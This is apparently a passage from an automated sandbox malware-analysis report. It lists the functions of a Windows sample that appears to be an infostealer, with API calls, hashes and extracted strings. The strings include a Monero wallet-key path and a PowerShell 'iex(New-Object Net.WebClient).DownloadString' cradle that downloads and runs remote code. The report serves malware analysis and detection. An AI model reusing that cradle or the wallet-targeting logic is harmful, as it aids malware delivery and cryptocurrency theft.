                                          • CloseHandle.KERNEL32(000000FF), ref: 00E99A9A
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2176067098.0000000000E91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                          • Associated: 00000000.00000002.2176049629.0000000000E90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F41000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.00000000010DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.000000000126F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.000000000134A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001371000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001378000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001387000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176611925.0000000001388000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176742102.0000000001520000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176758538.0000000001521000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_e90000_file.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                          • String ID:
                                          • API String ID: 2311089104-0
                                          • Opcode ID: e4b2e9e97869630681670b4a8418e5ebaf6b710bc4cd036534dcb881e76fdb8b
                                          • Instruction ID: f237779d9ee38d374a2d85962076a8b5b72be6dde2159c887b1fe1993aae7678
                                          • Opcode Fuzzy Hash: e4b2e9e97869630681670b4a8418e5ebaf6b710bc4cd036534dcb881e76fdb8b
                                          • Instruction Fuzzy Hash: 583108B4A00209EFDF24CF94C985BAE77F5FF48344F108158E916AB294D779AA41CFA0
                                          Function 00EA4780 Relevance: 8.9, APIs: 7, Instructions: 101stringCOMMON
                                          Download Yara Rule
                                          APIs
                                          • lstrcat.KERNEL32(?,00BBF608), ref: 00EA47DB
                                            • Part of subcall function 00EA8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00EA8E0B
                                          • lstrcat.KERNEL32(?,00000000), ref: 00EA4801
                                          • lstrcat.KERNEL32(?,?), ref: 00EA4820
                                          • lstrcat.KERNEL32(?,?), ref: 00EA4834
                                          • lstrcat.KERNEL32(?,00BAA7C0), ref: 00EA4847
                                          • lstrcat.KERNEL32(?,?), ref: 00EA485B
                                          • lstrcat.KERNEL32(?,00BBE3C8), ref: 00EA486F
                                            • Part of subcall function 00EAA740: lstrcpy.KERNEL32(00EB0E17,00000000), ref: 00EAA788
                                            • Part of subcall function 00EA8D90: GetFileAttributesA.KERNEL32(00000000,?,00E91B54,?,?,00EB564C,?,?,00EB0E1F), ref: 00EA8D9F
                                            • Part of subcall function 00EA4570: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00EA4580
                                            • Part of subcall function 00EA4570: RtlAllocateHeap.NTDLL(00000000), ref: 00EA4587
                                            • Part of subcall function 00EA4570: wsprintfA.USER32 ref: 00EA45A6
                                            • Part of subcall function 00EA4570: FindFirstFileA.KERNEL32(?,?), ref: 00EA45BD
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2176067098.0000000000E91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                          • Associated: 00000000.00000002.2176049629.0000000000E90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F41000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.00000000010DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.000000000126F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.000000000134A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001371000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001378000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001387000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176611925.0000000001388000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176742102.0000000001520000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176758538.0000000001521000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_e90000_file.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                                          • String ID:
                                          • API String ID: 2540262943-0
                                          • Opcode ID: b3bb90ea42676bda3a16f1cbe3c93053629c4c7e50dfcd4a90b0f8990d75b180
                                          • Instruction ID: f57a8fec8ff685939ab0bdf9c26077aab07f8bf6bfa2f7bd481adfe7d58021e4
                                          • Opcode Fuzzy Hash: b3bb90ea42676bda3a16f1cbe3c93053629c4c7e50dfcd4a90b0f8990d75b180
                                          • Instruction Fuzzy Hash: 933186B2D0021897CB24F7B0DC86EEE73BCAB4C700F405599B759A7081EE74A789CB95
                                          Function 00EA2C90 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 99COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00EAA740: lstrcpy.KERNEL32(00EB0E17,00000000), ref: 00EAA788
                                            • Part of subcall function 00EAA9B0: lstrlen.KERNEL32(?,00BB8938,?,\Monero\wallet.keys,00EB0E17), ref: 00EAA9C5
                                            • Part of subcall function 00EAA9B0: lstrcpy.KERNEL32(00000000), ref: 00EAAA04
                                            • Part of subcall function 00EAA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00EAAA12
                                            • Part of subcall function 00EAA920: lstrcpy.KERNEL32(00000000,?), ref: 00EAA972
                                            • Part of subcall function 00EAA920: lstrcat.KERNEL32(00000000), ref: 00EAA982
                                            • Part of subcall function 00EAA8A0: lstrcpy.KERNEL32(?,00EB0E17), ref: 00EAA905
                                          • ShellExecuteEx.SHELL32(0000003C), ref: 00EA2D85
                                          Strings
                                          • ')", xrefs: 00EA2CB3
                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00EA2D04
                                          • <, xrefs: 00EA2D39
                                          • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00EA2CC4
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2176067098.0000000000E91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                          • Associated: 00000000.00000002.2176049629.0000000000E90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F41000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.00000000010DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.000000000126F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.000000000134A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001371000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001378000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001387000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176611925.0000000001388000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176742102.0000000001520000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176758538.0000000001521000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_e90000_file.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                                          • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          • API String ID: 3031569214-898575020
                                          • Opcode ID: f60393cdc16c4f80d2d0cba61579abd5bacd7c8ff0ee685c9c0910146a026ef7
                                          • Instruction ID: 0f80e88107a2bbd986614b18882d8b9cb3fe31456a9edbac28072443846aa7e2
                                          • Opcode Fuzzy Hash: f60393cdc16c4f80d2d0cba61579abd5bacd7c8ff0ee685c9c0910146a026ef7
                                          • Instruction Fuzzy Hash: E041CC71D103089ADB58EFA0C896BEEB7B4AF19300F445129F106BB191EF747A4ACF91
                                          Function 00E99E10 Relevance: 7.7, APIs: 1, Strings: 4, Instructions: 170memoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • LocalAlloc.KERNEL32(00000040,?), ref: 00E99F41
                                            • Part of subcall function 00EAA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00EAA7E6
                                            • Part of subcall function 00EAA740: lstrcpy.KERNEL32(00EB0E17,00000000), ref: 00EAA788
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2176067098.0000000000E91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                          • Associated: 00000000.00000002.2176049629.0000000000E90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F41000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.00000000010DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.000000000126F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.000000000134A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001371000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001378000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001387000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176611925.0000000001388000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176742102.0000000001520000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176758538.0000000001521000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_e90000_file.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: lstrcpy$AllocLocal
                                          • String ID: @$ERROR_RUN_EXTRACTOR$v10$v20
                                          • API String ID: 4171519190-1096346117
                                          • Opcode ID: 1956e5d38075074ba22cd44e49b4d6d6921adf7ae69a3ab22050201bc6d2419e
                                          • Instruction ID: 7ed90f9bf791811ec5f3f7da635589456ef2934204e581a5f44cafb32d501828
                                          • Opcode Fuzzy Hash: 1956e5d38075074ba22cd44e49b4d6d6921adf7ae69a3ab22050201bc6d2419e
                                          • Instruction Fuzzy Hash: 07612E71A002489BDF24EFA4CC96FEE77B5AF45300F449528F90A6F191EB746A05CB92
                                          Function 00EA40B0 Relevance: 7.6, APIs: 5, Instructions: 124registrystringCOMMON
                                          Download Yara Rule
                                          APIs
                                          • RegOpenKeyExA.ADVAPI32(80000001,00BBE448,00000000,00020119,?), ref: 00EA40F4
                                          • RegQueryValueExA.ADVAPI32(?,00BBF6F8,00000000,00000000,00000000,000000FF), ref: 00EA4118
                                          • RegCloseKey.ADVAPI32(?), ref: 00EA4122
                                          • lstrcat.KERNEL32(?,00000000), ref: 00EA4147
                                          • lstrcat.KERNEL32(?,00BBF710), ref: 00EA415B
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2176067098.0000000000E91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                          • Associated: 00000000.00000002.2176049629.0000000000E90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F41000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.00000000010DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.000000000126F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.000000000134A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001371000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001378000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001387000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176611925.0000000001388000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176742102.0000000001520000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176758538.0000000001521000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_e90000_file.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: lstrcat$CloseOpenQueryValue
                                          • String ID:
                                          • API String ID: 690832082-0
                                          • Opcode ID: 35ba088877c02c2812b5016276889538f25e0888ac81216e43d4ab7713256495
                                          • Instruction ID: c289493b9636385fd0d48f3f04078f7c00507d34f2b69553ade794b507d27a34
                                          • Opcode Fuzzy Hash: 35ba088877c02c2812b5016276889538f25e0888ac81216e43d4ab7713256495
                                          • Instruction Fuzzy Hash: 65418BB6D00108ABDB24EBB0DC46FFE737DAB8C300F408558BA5557185EE756B888BD1
                                          Function 00EA6920 Relevance: 7.6, APIs: 5, Instructions: 67timeCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetSystemTime.KERNEL32(?), ref: 00EA696C
                                          • sscanf.NTDLL ref: 00EA6999
                                          • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00EA69B2
                                          • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00EA69C0
                                          • ExitProcess.KERNEL32 ref: 00EA69DA
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2176067098.0000000000E91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                          • Associated: 00000000.00000002.2176049629.0000000000E90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F41000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.00000000010DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.000000000126F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.000000000134A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001371000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001378000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001387000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176611925.0000000001388000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176742102.0000000001520000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176758538.0000000001521000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_e90000_file.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Time$System$File$ExitProcesssscanf
                                          • String ID:
                                          • API String ID: 2533653975-0
                                          • Opcode ID: ba8426dfad5bbf5fafc3d9239ed729132b4a6202520c6594916b6162179a72f3
                                          • Instruction ID: feab951dcdf6b6c978a9d582399491886e63e6c465cf159b640f2eb5d611488c
                                          • Opcode Fuzzy Hash: ba8426dfad5bbf5fafc3d9239ed729132b4a6202520c6594916b6162179a72f3
                                          • Instruction Fuzzy Hash: FD21EA75E00208ABCF08EFE4D945AEEB7B9BF4D300F04852AE416B7244EB356605CB69
                                          Function 00EA7E00 Relevance: 7.6, APIs: 5, Instructions: 58registrymemoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00EA7E37
                                          • RtlAllocateHeap.NTDLL(00000000), ref: 00EA7E3E
                                          • RegOpenKeyExA.ADVAPI32(80000002,00BABBC0,00000000,00020119,?), ref: 00EA7E5E
                                          • RegQueryValueExA.ADVAPI32(?,00BBE748,00000000,00000000,000000FF,000000FF), ref: 00EA7E7F
                                          • RegCloseKey.ADVAPI32(?), ref: 00EA7E92
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2176067098.0000000000E91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                          • Associated: 00000000.00000002.2176049629.0000000000E90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F41000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.00000000010DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.000000000126F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.000000000134A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001371000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001378000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001387000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176611925.0000000001388000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176742102.0000000001520000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176758538.0000000001521000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_e90000_file.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                          • String ID:
                                          • API String ID: 3225020163-0
                                          • Opcode ID: bc3e8c633dcd4049c92f54b0ee340adaf8a4f9b04ab1b55c18cc9f4c3db16d7f
                                          • Instruction ID: d18669b0358a01aa95805bcc7591db27950d44886bb54672d35c9b752393da86
                                          • Opcode Fuzzy Hash: bc3e8c633dcd4049c92f54b0ee340adaf8a4f9b04ab1b55c18cc9f4c3db16d7f
                                          • Instruction Fuzzy Hash: D41173B1B44205EBD710DF94DD4AFBBBBB8FB48710F108159FA46A7284D77969008BA0
                                          Function 00EA9260 Relevance: 7.5, APIs: 4, Strings: 1, Instructions: 41stringCOMMON
                                          Download Yara Rule
                                          APIs
                                          • StrStrA.SHLWAPI(00BBF590,?,?,?,00EA140C,?,00BBF590,00000000), ref: 00EA926C
                                          • lstrcpyn.KERNEL32(010DAB88,00BBF590,00BBF590,?,00EA140C,?,00BBF590), ref: 00EA9290
                                          • lstrlen.KERNEL32(?,?,00EA140C,?,00BBF590), ref: 00EA92A7
                                          • wsprintfA.USER32 ref: 00EA92C7
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2176067098.0000000000E91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                          • Associated: 00000000.00000002.2176049629.0000000000E90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F41000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.00000000010DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.000000000126F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.000000000134A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001371000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001378000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001387000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176611925.0000000001388000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176742102.0000000001520000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176758538.0000000001521000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_e90000_file.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: lstrcpynlstrlenwsprintf
                                          • String ID: %s%s
                                          • API String ID: 1206339513-3252725368
                                          • Opcode ID: 35473a13cf15fdcb1dc918171a55416839ce35744d699721893c7f303ecf3556
                                          • Instruction ID: ac56a2e49b367fbb491e50b9f4b4573b6554379064623017f46a88e28f4de275
                                          • Opcode Fuzzy Hash: 35473a13cf15fdcb1dc918171a55416839ce35744d699721893c7f303ecf3556
                                          • Instruction Fuzzy Hash: 0601CC75601208FFCB14DFECD984EAE7BB9FF48364F108548F9499B205C639AA41DB90
                                          Function 00E912A0 Relevance: 7.5, APIs: 5, Instructions: 39registrymemoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00E912B4
                                          • RtlAllocateHeap.NTDLL(00000000), ref: 00E912BB
                                          • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 00E912D7
                                          • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 00E912F5
                                          • RegCloseKey.ADVAPI32(?), ref: 00E912FF
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2176067098.0000000000E91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                          • Associated: 00000000.00000002.2176049629.0000000000E90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F41000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.00000000010DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.000000000126F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.000000000134A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001371000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001378000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001387000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176611925.0000000001388000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176742102.0000000001520000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176758538.0000000001521000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_e90000_file.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                          • String ID:
                                          • API String ID: 3225020163-0
                                          • Opcode ID: 3538dd3488e3061178a9ab90b07efc0fa7bc6b53629e41b34afa3e5d2a14e569
                                          • Instruction ID: ac579f6bee30b1507a4f4d912b44960f1bcbc3d9376d0ab25000fa3d97753dbf
                                          • Opcode Fuzzy Hash: 3538dd3488e3061178a9ab90b07efc0fa7bc6b53629e41b34afa3e5d2a14e569
                                          • Instruction Fuzzy Hash: AE011DB9A40208FBDB10DFE0DC4AFAEB7B8EB48701F008159FE4597284D6759A018F50
                                          Function 00EAC84E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 129COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2176067098.0000000000E91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                          • Associated: 00000000.00000002.2176049629.0000000000E90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F41000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.00000000010DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.000000000126F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.000000000134A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001371000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001378000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001387000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176611925.0000000001388000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176742102.0000000001520000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176758538.0000000001521000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_e90000_file.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: String___crt$Type
                                          • String ID:
                                          • API String ID: 2109742289-3916222277
                                          • Opcode ID: 9afff9c1a3a62e2409a240382f6fad6facb2ab3d74db01f0fb25ac13050d3749
                                          • Instruction ID: b2d1fbaeb91c116784263130fbef4944772e0278066dc033847260b357564514
